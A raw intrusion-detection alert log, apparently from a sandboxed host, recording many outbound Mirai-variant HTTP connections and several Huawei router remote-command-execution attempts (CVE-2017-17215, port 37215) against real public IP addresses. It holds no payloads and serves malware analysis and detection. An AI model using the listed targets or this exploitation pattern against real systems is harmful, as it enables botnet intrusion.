192.168.2.2395.100.34.11847050802839471 11/22/23-08:40:30.413516	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47050	80	192.168.2.23	95.100.34.118
192.168.2.2395.164.11.20939486802839471 11/22/23-08:39:49.927590	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39486	80	192.168.2.23	95.164.11.209
192.168.2.23112.30.213.5656140802839471 11/22/23-08:38:47.952245	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56140	80	192.168.2.23	112.30.213.56
192.168.2.2388.99.177.1251482802839471 11/22/23-08:39:18.940078	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51482	80	192.168.2.23	88.99.177.12
192.168.2.2395.100.139.7858242802839471 11/22/23-08:38:32.451423	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58242	80	192.168.2.23	95.100.139.78
192.168.2.2388.99.14.7049472802839471 11/22/23-08:38:50.250989	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49472	80	192.168.2.23	88.99.14.70
192.168.2.2395.85.214.11351698802839471 11/22/23-08:38:35.641496	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51698	80	192.168.2.23	95.85.214.113
192.168.2.23112.49.9.22438274802839471 11/22/23-08:38:57.534063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38274	80	192.168.2.23	112.49.9.224
192.168.2.2395.101.95.2734196802839471 11/22/23-08:39:40.881182	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34196	80	192.168.2.23	95.101.95.27
192.168.2.2395.153.38.1434780802839471 11/22/23-08:39:59.838473	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34780	80	192.168.2.23	95.153.38.14
192.168.2.2388.210.17.8355668802839471 11/22/23-08:39:20.517145	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55668	80	192.168.2.23	88.210.17.83
192.168.2.2388.129.109.5546502802839471 11/22/23-08:39:29.795993	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46502	80	192.168.2.23	88.129.109.55
192.168.2.2395.214.59.19747398802839471 11/22/23-08:38:58.796445	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47398	80	192.168.2.23	95.214.59.197
192.168.2.2395.100.150.4647846802839471 11/22/23-08:39:23.475977	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47846	80	192.168.2.23	95.100.150.46
192.168.2.2395.134.9.17738718802839471 11/22/23-08:38:24.778573	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38718	80	192.168.2.23	95.134.9.177
192.168.2.2395.181.228.15049892802839471 11/22/23-08:38:45.911212	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49892	80	192.168.2.23	95.181.228.150
192.168.2.2395.130.227.4353112802839471 11/22/23-08:38:58.172584	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53112	80	192.168.2.23	95.130.227.43
192.168.2.2395.217.192.1038092802839471 11/22/23-08:38:19.602811	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38092	80	192.168.2.23	95.217.192.10
192.168.2.2395.104.86.7952876802839471 11/22/23-08:39:55.277489	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52876	80	192.168.2.23	95.104.86.79
192.168.2.2388.99.2.4444682802839471 11/22/23-08:39:09.902001	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44682	80	192.168.2.23	88.99.2.44
192.168.2.2388.99.93.2259478802839471 11/22/23-08:40:06.938090	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59478	80	192.168.2.23	88.99.93.22
192.168.2.2395.85.110.22043998802839471 11/22/23-08:40:06.749263	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43998	80	192.168.2.23	95.85.110.220
192.168.2.23112.74.89.4252462802839471 11/22/23-08:40:15.687197	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52462	80	192.168.2.23	112.74.89.42
192.168.2.23112.125.198.4350828802839471 11/22/23-08:40:21.332828	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50828	80	192.168.2.23	112.125.198.43
192.168.2.2395.217.53.6533556802839471 11/22/23-08:38:42.834352	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33556	80	192.168.2.23	95.217.53.65
192.168.2.2395.86.103.20841578802839471 11/22/23-08:38:32.471725	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41578	80	192.168.2.23	95.86.103.208
192.168.2.2395.110.209.7154920802839471 11/22/23-08:38:40.952261	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54920	80	192.168.2.23	95.110.209.71
192.168.2.2395.85.185.23446922802839471 11/22/23-08:40:13.905119	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46922	80	192.168.2.23	95.85.185.234
192.168.2.2395.216.154.13148138802839471 11/22/23-08:39:09.715103	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48138	80	192.168.2.23	95.216.154.131
192.168.2.2395.100.77.20539866802839471 11/22/23-08:38:58.776242	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39866	80	192.168.2.23	95.100.77.205
192.168.2.23112.196.16.13741498802839471 11/22/23-08:38:48.314603	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41498	80	192.168.2.23	112.196.16.137
192.168.2.23112.48.136.7050186802839471 11/22/23-08:39:59.558274	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50186	80	192.168.2.23	112.48.136.70
192.168.2.2341.42.157.2449582372152829579 11/22/23-08:38:57.907901	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	49582	37215	192.168.2.23	41.42.157.24
192.168.2.2395.217.2.15548740802839471 11/22/23-08:38:28.333749	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48740	80	192.168.2.23	95.217.2.155
192.168.2.2395.100.139.7858132802839471 11/22/23-08:38:28.138683	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58132	80	192.168.2.23	95.100.139.78
192.168.2.2388.204.201.4252576802839471 11/22/23-08:40:24.948792	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52576	80	192.168.2.23	88.204.201.42
192.168.2.2341.42.81.18935538372152829579 11/22/23-08:40:01.779235	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	35538	37215	192.168.2.23	41.42.81.189
192.168.2.2388.221.130.25044532802839471 11/22/23-08:39:26.840314	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44532	80	192.168.2.23	88.221.130.250
192.168.2.2395.197.176.13152262802839471 11/22/23-08:39:06.548296	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52262	80	192.168.2.23	95.197.176.131
192.168.2.2395.100.76.13347808802839471 11/22/23-08:38:58.057555	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47808	80	192.168.2.23	95.100.76.133
192.168.2.2395.101.247.18943618802839471 11/22/23-08:37:53.327357	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43618	80	192.168.2.23	95.101.247.189
192.168.2.23197.56.131.17635542372152835222 11/22/23-08:39:23.590260	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	35542	37215	192.168.2.23	197.56.131.176
192.168.2.2395.244.239.22843538802839471 11/22/23-08:38:58.788368	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43538	80	192.168.2.23	95.244.239.228
192.168.2.2395.31.197.1939706802839471 11/22/23-08:38:42.895599	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39706	80	192.168.2.23	95.31.197.19
192.168.2.23112.125.213.2634836802839471 11/22/23-08:38:11.688359	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34836	80	192.168.2.23	112.125.213.26
192.168.2.2395.86.66.855812802839471 11/22/23-08:38:25.027667	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55812	80	192.168.2.23	95.86.66.8
192.168.2.2395.65.80.24144676802839471 11/22/23-08:40:10.705723	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44676	80	192.168.2.23	95.65.80.241
192.168.2.2388.208.215.24641694802839471 11/22/23-08:38:38.643857	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41694	80	192.168.2.23	88.208.215.246
192.168.2.23112.137.39.7043350802839471 11/22/23-08:39:12.368004	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43350	80	192.168.2.23	112.137.39.70
192.168.2.2395.217.58.3437360802839471 11/22/23-08:40:10.679992	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37360	80	192.168.2.23	95.217.58.34
192.168.2.2395.183.36.13751582802839471 11/22/23-08:38:17.584780	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51582	80	192.168.2.23	95.183.36.137
192.168.2.2388.99.142.9058568802839471 11/22/23-08:38:26.460926	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58568	80	192.168.2.23	88.99.142.90
192.168.2.2395.101.146.13633076802839471 11/22/23-08:38:40.849760	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33076	80	192.168.2.23	95.101.146.136
192.168.2.23112.126.173.12843370802839471 11/22/23-08:39:01.453138	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43370	80	192.168.2.23	112.126.173.128
192.168.2.2395.129.23.8032976802839471 11/22/23-08:39:26.112226	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32976	80	192.168.2.23	95.129.23.80
192.168.2.23112.28.221.21259214802839471 11/22/23-08:38:48.314824	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59214	80	192.168.2.23	112.28.221.212
192.168.2.2395.107.4.5658114802839471 11/22/23-08:40:27.031046	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58114	80	192.168.2.23	95.107.4.56
192.168.2.2395.217.121.16738840802839471 11/22/23-08:39:46.060439	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38840	80	192.168.2.23	95.217.121.167
192.168.2.2395.80.31.5639272802839471 11/22/23-08:39:54.929554	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39272	80	192.168.2.23	95.80.31.56
192.168.2.2395.216.140.9844060802839471 11/22/23-08:40:24.481678	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44060	80	192.168.2.23	95.216.140.98
192.168.2.23112.126.102.8245378802839471 11/22/23-08:39:18.805115	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45378	80	192.168.2.23	112.126.102.82
192.168.2.2395.100.224.24653398802839471 11/22/23-08:37:53.331912	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53398	80	192.168.2.23	95.100.224.246
192.168.2.23112.197.122.9054994802839471 11/22/23-08:39:09.591904	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54994	80	192.168.2.23	112.197.122.90
192.168.2.23112.126.235.9042768802839471 11/22/23-08:39:29.396836	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42768	80	192.168.2.23	112.126.235.90
192.168.2.2395.101.242.18349194802839471 11/22/23-08:40:04.676583	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49194	80	192.168.2.23	95.101.242.183
192.168.2.2388.221.127.438348802839471 11/22/23-08:40:14.089061	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38348	80	192.168.2.23	88.221.127.4
192.168.2.2388.12.59.12453814802839471 11/22/23-08:40:12.481780	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53814	80	192.168.2.23	88.12.59.124
192.168.2.2395.107.233.1049470802839471 11/22/23-08:37:50.644356	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49470	80	192.168.2.23	95.107.233.10
192.168.2.2395.220.219.10542150802839471 11/22/23-08:40:27.026172	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42150	80	192.168.2.23	95.220.219.105
192.168.2.23112.184.162.16140052802839471 11/22/23-08:39:18.751143	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40052	80	192.168.2.23	112.184.162.161
192.168.2.2395.97.116.14658852802839471 11/22/23-08:40:21.534185	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58852	80	192.168.2.23	95.97.116.146
192.168.2.23112.176.165.1655754802839471 11/22/23-08:38:46.205746	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55754	80	192.168.2.23	112.176.165.16
192.168.2.2395.181.216.8060068802839471 11/22/23-08:38:45.358062	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60068	80	192.168.2.23	95.181.216.80
192.168.2.2388.221.205.14648916802839471 11/22/23-08:38:26.481084	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48916	80	192.168.2.23	88.221.205.146
192.168.2.2395.215.241.3959496802839471 11/22/23-08:40:28.945103	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59496	80	192.168.2.23	95.215.241.39
192.168.2.2395.175.23.22836152802839471 11/22/23-08:38:26.713988	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36152	80	192.168.2.23	95.175.23.228
192.168.2.23112.127.51.18341168802839471 11/22/23-08:39:40.672184	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41168	80	192.168.2.23	112.127.51.183
192.168.2.2395.216.103.9151076802839471 11/22/23-08:38:58.787917	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51076	80	192.168.2.23	95.216.103.91
192.168.2.2341.45.28.25546578372152835222 11/22/23-08:39:28.880184	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	46578	37215	192.168.2.23	41.45.28.255
192.168.2.2388.198.184.16249680802839471 11/22/23-08:40:24.670382	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49680	80	192.168.2.23	88.198.184.162
192.168.2.2388.198.112.8145660802839471 11/22/23-08:38:50.628487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45660	80	192.168.2.23	88.198.112.81
192.168.2.2395.101.197.20134432802839471 11/22/23-08:40:18.583344	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34432	80	192.168.2.23	95.101.197.201
192.168.2.2388.221.47.7355186802839471 11/22/23-08:39:29.601718	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55186	80	192.168.2.23	88.221.47.73
192.168.2.23112.125.237.7852558802839471 11/22/23-08:40:09.539595	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52558	80	192.168.2.23	112.125.237.78
192.168.2.23112.213.95.15357416802839471 11/22/23-08:39:12.928632	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57416	80	192.168.2.23	112.213.95.153
192.168.2.2388.47.36.3441260802839471 11/22/23-08:40:28.513564	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41260	80	192.168.2.23	88.47.36.34
192.168.2.2395.100.188.17760070802839471 11/22/23-08:40:27.060501	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60070	80	192.168.2.23	95.100.188.177
192.168.2.23197.224.204.22249476372152835222 11/22/23-08:39:47.427391	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	49476	37215	192.168.2.23	197.224.204.222
192.168.2.2388.80.190.16659818802839471 11/22/23-08:38:50.615815	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59818	80	192.168.2.23	88.80.190.166
192.168.2.2388.116.156.7847866802839471 11/22/23-08:40:01.783128	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47866	80	192.168.2.23	88.116.156.78
192.168.2.2395.86.79.20945960802839471 11/22/23-08:40:28.946483	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45960	80	192.168.2.23	95.86.79.209
192.168.2.23112.126.68.22039390802839471 11/22/23-08:39:25.697817	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39390	80	192.168.2.23	112.126.68.220
192.168.2.2388.99.88.20256722802839471 11/22/23-08:39:47.996403	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56722	80	192.168.2.23	88.99.88.202
192.168.2.2388.178.249.4358080802839471 11/22/23-08:39:30.191762	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58080	80	192.168.2.23	88.178.249.43
192.168.2.2395.217.85.3452566802839471 11/22/23-08:37:50.622884	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52566	80	192.168.2.23	95.217.85.34
192.168.2.23112.74.95.13044266802839471 11/22/23-08:38:11.398847	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44266	80	192.168.2.23	112.74.95.130
192.168.2.23112.126.231.22432898802839471 11/22/23-08:38:29.850696	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32898	80	192.168.2.23	112.126.231.224
192.168.2.23112.46.49.14834728802839471 11/22/23-08:38:13.291656	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34728	80	192.168.2.23	112.46.49.148
192.168.2.2388.208.197.20749210802839471 11/22/23-08:40:16.872739	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49210	80	192.168.2.23	88.208.197.207
192.168.2.2341.239.75.24534908372152829579 11/22/23-08:39:28.883760	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	34908	37215	192.168.2.23	41.239.75.245
192.168.2.23112.126.169.11736624802839471 11/22/23-08:38:39.122241	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36624	80	192.168.2.23	112.126.169.117
192.168.2.2388.237.122.19435218802839471 11/22/23-08:39:06.957682	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35218	80	192.168.2.23	88.237.122.194
192.168.2.2395.100.245.11254266802839471 11/22/23-08:38:24.732819	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54266	80	192.168.2.23	95.100.245.112
192.168.2.2395.110.164.13838012802839471 11/22/23-08:38:58.798649	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38012	80	192.168.2.23	95.110.164.138
192.168.2.23112.25.90.16048118802839471 11/22/23-08:40:26.613096	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48118	80	192.168.2.23	112.25.90.160
192.168.2.2395.101.225.3755318802839471 11/22/23-08:40:10.663033	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55318	80	192.168.2.23	95.101.225.37
192.168.2.2395.101.219.24634344802839471 11/22/23-08:39:09.713208	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34344	80	192.168.2.23	95.101.219.246
192.168.2.2395.217.105.15856396802839471 11/22/23-08:40:04.851468	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56396	80	192.168.2.23	95.217.105.158
192.168.2.23112.126.178.23358212802839471 11/22/23-08:39:39.354619	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58212	80	192.168.2.23	112.126.178.233
192.168.2.23112.168.157.11351222802839471 11/22/23-08:40:26.519287	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51222	80	192.168.2.23	112.168.157.113
192.168.2.23112.48.136.7050182802839471 11/22/23-08:40:00.579221	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50182	80	192.168.2.23	112.48.136.70
192.168.2.2388.147.94.18046354802839471 11/22/23-08:40:01.791558	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46354	80	192.168.2.23	88.147.94.180
192.168.2.2395.86.197.12253568802839471 11/22/23-08:38:19.636162	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53568	80	192.168.2.23	95.86.197.122
192.168.2.23112.126.151.13354714802839471 11/22/23-08:38:46.231448	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54714	80	192.168.2.23	112.126.151.133
192.168.2.2395.100.115.1559134802839471 11/22/23-08:38:17.557693	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59134	80	192.168.2.23	95.100.115.15
192.168.2.2395.101.143.13448978802839471 11/22/23-08:40:04.481985	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48978	80	192.168.2.23	95.101.143.134
192.168.2.23112.74.188.18650242802839471 11/22/23-08:38:39.142495	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50242	80	192.168.2.23	112.74.188.186
192.168.2.23112.135.221.13555902802839471 11/22/23-08:39:01.466941	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55902	80	192.168.2.23	112.135.221.135
192.168.2.2388.87.94.9856890802839471 11/22/23-08:40:10.015303	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56890	80	192.168.2.23	88.87.94.98
192.168.2.23112.3.25.4340568802839471 11/22/23-08:39:35.002913	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40568	80	192.168.2.23	112.3.25.43
192.168.2.2395.179.146.10547998802839471 11/22/23-08:38:19.586883	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47998	80	192.168.2.23	95.179.146.105
192.168.2.23112.124.215.1356224802839471 11/22/23-08:37:59.868355	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56224	80	192.168.2.23	112.124.215.13
192.168.2.23112.125.209.23649276802839471 11/22/23-08:40:30.811258	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49276	80	192.168.2.23	112.125.209.236
192.168.2.23112.126.72.14149254802839471 11/22/23-08:37:59.865507	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49254	80	192.168.2.23	112.126.72.141
192.168.2.23112.151.46.20643262802839471 11/22/23-08:40:01.271370	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43262	80	192.168.2.23	112.151.46.206
192.168.2.2395.66.130.20452974802839471 11/22/23-08:38:00.066287	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52974	80	192.168.2.23	95.66.130.204
192.168.2.23112.213.98.13635426802839471 11/22/23-08:39:47.826126	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35426	80	192.168.2.23	112.213.98.136
192.168.2.23112.125.195.4351742802839471 11/22/23-08:38:22.233953	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51742	80	192.168.2.23	112.125.195.43
192.168.2.2388.114.206.2247994802839471 11/22/23-08:40:18.745961	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47994	80	192.168.2.23	88.114.206.22
192.168.2.23112.74.190.10735438802839471 11/22/23-08:39:40.691805	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35438	80	192.168.2.23	112.74.190.107
192.168.2.2395.101.190.758064802839471 11/22/23-08:38:30.026964	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58064	80	192.168.2.23	95.101.190.7
192.168.2.2388.221.37.9848434802839471 11/22/23-08:40:21.840850	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48434	80	192.168.2.23	88.221.37.98
192.168.2.23112.125.169.2553834802839471 11/22/23-08:38:48.255983	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53834	80	192.168.2.23	112.125.169.25
192.168.2.2388.221.4.6450526802839471 11/22/23-08:39:14.679114	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50526	80	192.168.2.23	88.221.4.64
192.168.2.23112.222.225.2340434802839471 11/22/23-08:38:48.860354	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40434	80	192.168.2.23	112.222.225.23
192.168.2.2388.221.16.6753016802839471 11/22/23-08:38:26.491841	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53016	80	192.168.2.23	88.221.16.67
192.168.2.2395.170.72.9842606802839471 11/22/23-08:38:58.076212	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42606	80	192.168.2.23	95.170.72.98
192.168.2.23112.186.187.24445096802839471 11/22/23-08:37:59.848525	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45096	80	192.168.2.23	112.186.187.244
192.168.2.23112.156.253.25145822802839471 11/22/23-08:38:29.841252	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45822	80	192.168.2.23	112.156.253.251
192.168.2.2388.86.202.3240488802839471 11/22/23-08:40:24.899263	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40488	80	192.168.2.23	88.86.202.32
192.168.2.23112.166.156.13459230802839471 11/22/23-08:38:15.705178	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59230	80	192.168.2.23	112.166.156.134
192.168.2.2395.101.167.18944690802839471 11/22/23-08:38:24.926461	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44690	80	192.168.2.23	95.101.167.189
192.168.2.2388.221.231.24438340802839471 11/22/23-08:38:03.499480	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38340	80	192.168.2.23	88.221.231.244
192.168.2.2388.99.203.25454544802839471 11/22/23-08:39:06.716523	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54544	80	192.168.2.23	88.99.203.254
192.168.2.2388.249.182.16338218802839471 11/22/23-08:40:18.777805	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38218	80	192.168.2.23	88.249.182.163
192.168.2.2388.198.211.22754600802839471 11/22/23-08:40:04.308999	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54600	80	192.168.2.23	88.198.211.227
192.168.2.2388.228.99.16742412802839471 11/22/23-08:39:29.451182	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42412	80	192.168.2.23	88.228.99.167
192.168.2.2388.221.247.21257394802839471 11/22/23-08:38:38.467008	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57394	80	192.168.2.23	88.221.247.212
192.168.2.23112.125.210.22040100802839471 11/22/23-08:38:48.256576	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40100	80	192.168.2.23	112.125.210.220
192.168.2.2395.10.80.25048742802839471 11/22/23-08:39:09.756980	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48742	80	192.168.2.23	95.10.80.250
192.168.2.2388.87.10.6734596802839471 11/22/23-08:39:32.823483	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34596	80	192.168.2.23	88.87.10.67
192.168.2.2388.210.101.10836970802839471 11/22/23-08:38:02.088586	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36970	80	192.168.2.23	88.210.101.108
192.168.2.2395.58.246.12859824802839471 11/22/23-08:39:23.683019	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59824	80	192.168.2.23	95.58.246.128
192.168.2.2341.34.202.18946134372152829579 11/22/23-08:38:13.131600	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	46134	37215	192.168.2.23	41.34.202.189
192.168.2.2388.198.237.2440666802839471 11/22/23-08:38:35.244983	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40666	80	192.168.2.23	88.198.237.24
192.168.2.2395.213.252.22760534802839471 11/22/23-08:38:45.358568	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60534	80	192.168.2.23	95.213.252.227
192.168.2.2395.100.244.19235474802839471 11/22/23-08:39:36.582702	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35474	80	192.168.2.23	95.100.244.192
192.168.2.2395.163.120.13240730802839471 11/22/23-08:39:49.498559	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40730	80	192.168.2.23	95.163.120.132
192.168.2.23112.179.60.25344984802839471 11/22/23-08:38:57.087487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44984	80	192.168.2.23	112.179.60.253
192.168.2.2395.43.244.2335898802839471 11/22/23-08:38:58.810096	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35898	80	192.168.2.23	95.43.244.23
